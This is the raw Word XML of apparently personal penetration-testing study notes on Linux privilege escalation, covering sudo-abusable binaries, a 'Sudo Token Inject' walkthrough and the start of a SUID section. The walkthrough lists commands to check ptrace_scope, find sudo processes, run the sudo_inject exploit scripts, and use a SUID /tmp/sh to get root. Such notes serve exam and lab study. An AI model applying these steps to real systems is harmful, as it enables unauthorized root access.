    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command creates a symbolic link (-s) forcibly (-f) from /root/ to /tmp/. In other words, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/root will become a symlink to /root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So running this command will create a directory /root inside of /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this led to nowhere, but it was cool to learn about</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/ln</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000205F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Had another interesting attack vector with having to use multiple users on the same machine in order to exploit the command in sudo -l. It had to do with /.cgi-bin/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002060">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002061">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002062">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/crontab -l, /usr/sbin/tcpdump, /usr/bin/apt-get</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002063">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These 3 were seen in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 18.4.2. Abusing Sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002064">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002065">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if you see any of these, look at that section for how to abuse them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002066">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206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68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002069">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gwi0wf5w0t0a" w:id="281"/>
      <w:bookmarkEnd w:id="281"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo Token Inject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Have yet to actually see this. It was in Powall's checklist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId698">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/nongiach/sudo_inject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000206F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Downloads/sudo-token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002070">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002071">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You know how when you run "sudo -l" and then you type in your password, and then you do "sudo -l" again (or any sudo command) and it doesn't prompt you for password? It remembers that you are able to do sudo? Well, we can abuse this by taking that sudo token and using it to priv esc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002072">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /proc/sys/kernel/yama/ptrace_scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If output is "0" then it might be vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try running sudo to trigger a token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002077">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002078">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it asks for password and you don't know it, then press "CTRL + C"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002079">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then look for processes that have Sudo token and have our UID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps -e -o pid,uid,cmd | grep $(id -u) | grep sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automatically search for any sudo processes with your UID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps -e -o pid,uid,cmd | grep $(id -u)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Looks for all processes with our UID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for any processes that have SUDO in it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000207F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you find any sudo processes with your UID, then run either exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002080">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./exploit.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should make it so that you can run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" without password and get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./exploit_v2.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creates SUID sh in /tmp/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="372"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/sh -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002085">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208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087">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002088">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gfldleadglq1" w:id="282"/>
      <w:bookmarkEnd w:id="282"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002089">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4992405" cy="4481513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="392" name="image393.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image393.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId699"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4992405" cy="4481513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000208D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="882"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
